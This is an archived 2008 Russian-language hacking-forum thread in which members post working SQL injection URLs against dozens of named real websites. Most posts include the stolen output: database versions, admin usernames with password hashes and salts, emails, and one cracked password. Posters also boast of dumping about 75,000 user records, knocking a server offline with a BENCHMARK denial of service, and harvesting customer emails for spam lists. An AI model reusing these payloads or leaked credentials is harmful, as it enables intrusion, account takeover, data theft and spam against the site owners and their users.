HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.02.2008, 22:13
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

masarykovazs.eu
Код:
http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11/*
masarykovazs.eu@localhost:5.0.38-Debian_1-log:masarykovazs_eu
Код:
http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11+from+info   rmation_schema.tables/*
Код:
http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,column_name,2,3,4,5,6,7,8,9,10,11+from+inf   ormation_schema.columns/*
visit-palawan.com
Код:
http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(USER   (),0x3a,VERSION(),0x3a,DATABASE())/*
Код:
http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(tabl   e_name)+from+information_schema.tables/*
Код:
http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,column_name   +from+information_schema.columns/*
sitedefteri.com
Код:
http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,concat(USER(),0x3a,VERSION(),0x3a,DAT   ABASE()),5,6,7,8,9,10,11,12,13,14,15/*
root@localhost:5.0.32-Debian_7etch3-log:linkdefteri
Код:
http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,1   5+from+information_schema.tables/*
Код:
http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,   15+from+information_schema.columns/*
toy-icti.org
Код:
http://www.toy-icti.org/newsletter/index.php?NID=299999+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a   ,DATABASE()),3/*
seekwell@localhost:4.0.22-Max:SWicti-06
 
Ответить с цитированием

  #2  
Старый 08.02.2008, 22:23
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

Цитата:
http://www.rooid.ru/index.php?action=staties&id=-9+union+select+1,2,concat_ws(0x3a,username,user_pa ssword),4,5,6,7+from+phpbb_users/*
5.0.32-Debian_7etch5-log
Админы форума:
Admin:6689263e6df1fbd89377d1dac02f87b0:125040
Stan:0057f84026c20b2a4cdeaf15824773bb:arowana
-----------------------------------------------------
Цитата:
http://www.eurohold.bg/presscenter.php?page=news&id=-286+union+select+1,concat_ws(0x3a,username,passwor d,status),3,4,5,6+from+administrators+limit+0,1/*
5.0.45-log
admin:5569aeb9a91a05eac4bb0186116e44c7
 
Ответить с цитированием

  #3  
Старый 09.02.2008, 13:46
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

Код HTML:
http://kaleydoskop.com.ua/index.php?plugin=katalog&do=showUserContent&type=firms&id=index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+1,1/*
11::administrator::070670bb5da95b97f378e4b1a5a954d a::info@natalie-lamotte.com

Код HTML:
http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11
12::admin::670266c7724d26d023f1326f1020e919::eduar d.rapoport@pak-era.com
11::administrator::670266c7724d26d023f1326fb070c1d 0::admin@sahm.com.ua
 
Ответить с цитированием

порция скулей
  #4  
Старый 09.02.2008, 21:21
nex0
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963

Репутация: 272
Отправить сообщение для nex0 с помощью ICQ
Smile порция скулей

activision2007.es (сайт испаского Activision)
Код:
http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,convert(concat(version(),0x3a,user(),0x3a,database()),binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
version() 4.1.18-nt
user() DBActivision27@localhost
database() gestion

табла usuario ~75000 юзеров!!! (узнал лимитом)
с трудом нашел колонки id, nombre, email......
Код:
http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,3,convert(concat(id,0x3a,nombre,0x3a,email),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+usuario+limit+0,100000
колонку с пассами мне не удалось найти=// так что пробуйте
p.s.потом я разозлился и отправил сервер bеnchmаrk'ом в глубокий DoS/ (часов 5 уже не работает)

ardana.ru
Код:
http://www.ardana.ru/products/product.php?gid=-1+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
version() 4.1.22-standard
user() ardana_ardana@localhost
database() ardana_ardana

otvet.su
Код:
http://www.otvet.su/tovar.php?gid=999999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
version() 5.0.24-standard
user() otvet1@localhost
database() db_otvet1

abandoneer.com
Код:
http://abandoneer.com/games.php?gameid=99999999/**/union/**/select/**/1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
version() 4.1.21-log
user() evilrafael@localhost
database() evilrafael
 
Ответить с цитированием

  #5  
Старый 10.02.2008, 00:39
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

Код:
http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/*&cat=11users%20id::login::pwd::email
4.1.20::sahm_user1@localhost::sahm_db


Код:
http://www.dharmahealing.org/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
supercristal:bdbfdaa664e59fd3f2ef5a51f0688e10


Код:
http://sacredaeon.com/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
supercristal:e5fe262def0b72b051d9d11301cde9b9

Код:
http://www.torcidaforcajovem.net/index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
admin:a1c3c4ff7c9a2064f788db3eb8a5fb49


Код:
http://www.xcsport.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
b983:6e321306ec723a50ee62d01f21638bb2f72e4592


Код:
http://www.rusquilt.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
7ae1:3dc58f7e1db2d269fadf0f519315f264db969552

Терь второй раз попробуем, если хэши расшифрованными кидать тогда виноват, просто уже тут видел, что выложивали не расшифрованным (конечно я пробывал рсшифровать), еще раз попрошу чтоб не пинали если че не так) исправлюсь)

Последний раз редактировалось CaNNabi$; 10.02.2008 в 01:47.. Причина: 2 .ru добавил)
 
Ответить с цитированием

  #6  
Старый 10.02.2008, 03:55
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Цитата:
Сообщение от nex0  
activision2007.es (сайт испаского Activision)
Код:
http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,convert(concat(version(),0x3a,user(),0x3a,database()),binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
Эм... А почему именно конвертом ?(проверить хотел).Серв кстати уже живой:РР.

http://www.activision2007.es/juego.php?jid=-125+BENCHMARK(10000000,BENCHMARK(10000000,md5(curr ent_date)))/* (Не получилось :Р).

P.S. Чесн не знаю,куда постить =____=.Напостил сюда,ибо адресовано аффтару=_______=

Последний раз редактировалось Велемир; 10.02.2008 в 04:11..
 
Ответить с цитированием

  #7  
Старый 10.02.2008, 05:09
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.mumbles.co.uk/shopinfo.php?ID=-18773+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+50,1/*
Код:
http://www.mumbles.co.uk/shopinfo.php?ID=-18773+union+select+concat(Username,0x3a,Password,0x3a,FromPage,0x3a,Email,0x3a,MobileNumber,0x3a,),2,3,4,5,6,7,8,9,10,11,12,13,14+from+UsersInfo+limit+10,1/*
Лимитом работаем, 5 версия дядя мускуля )
 
Ответить с цитированием

  #8  
Старый 10.02.2008, 17:38
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

Код:
http://tekno-tel.com.tr/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
admin:319e55412bb74b020ed3f3a234abd467
login admin
pass cenk


Код:
http://www.martimarket.com/marti/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
admin:c46a6b1297f0a201ba45276c97487886:PAWU6dFjN5U KqBqy

Код:
http://www.nounouchelanou.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
admin:6d9556fe5e923f525bd376b5269318b4

Код:
http://www.kinayperde.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
admin:bd0d324fd449c451d27e287e3c6e6af4

Код:
http://www.afbdcn.113t.info/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
Will:05f2cb7fe7346197f105afd7af4dd026:w5pYowRB0DCp iIiZ

Код:
http://supermaringa.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+jos_users--
mandarinus:e28aafeef6b3b3dc297d39dcab223d45:ds57L9 nOm9V0imMx
 
Ответить с цитированием

  #9  
Старый 10.02.2008, 21:48
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию

www.russianstreets.ru русские улицы)

Код:
http://russianstreets.ru/portal/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
2292:27c27680c60d01a3d8e475240c939205225ccb1a


www.atpc.ru про фотошо, веб програмировение и т.д.)

Код:
http://atpc.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
1a4f:1181e27c6638e80849094d2e0966f37a9072d1d0


www.housefind.ru че то про недвижимость)
Код:
http://housefind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
20da:b56a3d1f438b73afc451937e699969df9fba86a2


www.night.su никто не хочет в ночные клубы Москвы
Код:
http://night.su/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
6fc9:477bde830dd48056f8dba9d43e70d7cc8103bd93


www.kitchenz.ru кулинарам сюда)
Код:
http://kitchenz.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
2817:b94713de6a8efa6091262460fb1eced95d108a4c


www.medfind.ru медецина)
Код:
http://medfind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
429a:b56a3d1f438b73afc451937e699969df9fba86a2


www.stop-dieta.com против диеты)))
Код:
http://www.stop-dieta.com/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
0933:8b3adfeb5c4380ff9da37b2d7d500b2cbf25f790


www.vfgieu.ru филиал какого то универа не короч че то там)
Код:
http://www.vfgieu.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
63f5:e2a6a026d820802d28da72c53ea7960539b9ce71



www.nkamsk.name Новости Нижнекамска (городской портал кажется)))
Код:
http://nkamsk.name/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
c4b6:2c4f19dcdd338c700ca350214b5b3c2094d96b6c


www.kerben.org какой то Кыргызский сайт кажется)
Код:
http://www.kerben.org/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
8504:bba57d5597ca1249e69e61b870f89a62b9273930


www.make-up.by Косметика) минералы с Мертвого моря))
Код:
http://www.make-up.by/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
918c:8c15408d26cec74dd28a945e2cf28f9a3c684f11


www.rsp-ufa.ru коме Републиканская Стамоталогия?)
Код:
http://www.rsp-ufa.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
77e8:a2ceeb92aaaa985d41ee276bf5fcdf0f9b24fd13


www.dtp38.ru какая то автогражданка по русски
Код:
http://dtp38.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
bc25:bc0c5764022f27adcf9b600c0b8a920c227d36e2


www.auto.nkamsk.name че то про автомобили)
Код:
http://www.auto.nkamsk.name/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
f894:b6746140b60a76f50f8fc5ca804dca41944649dc

Я не могу остановиться все равно дальше делаю это же SQL, ща наверно еще выложу
 
Ответить с цитированием

  #10  
Старый 10.02.2008, 05:58
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

от нечего делать пробежался по шопам
Код HTML:
http://www.littlepinkshop.com/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
http://www.genesissurfshop.com/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
http://www.naturallydoesit.co.uk/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
http://www.healthbeyond2000.co.nz/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
http://www.patriciawatson.net/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
http://simplybearings.com/shop/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
Собираем спам Базы чистый валид 99 %

Последний раз редактировалось satana8920; 11.02.2008 в 07:52..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ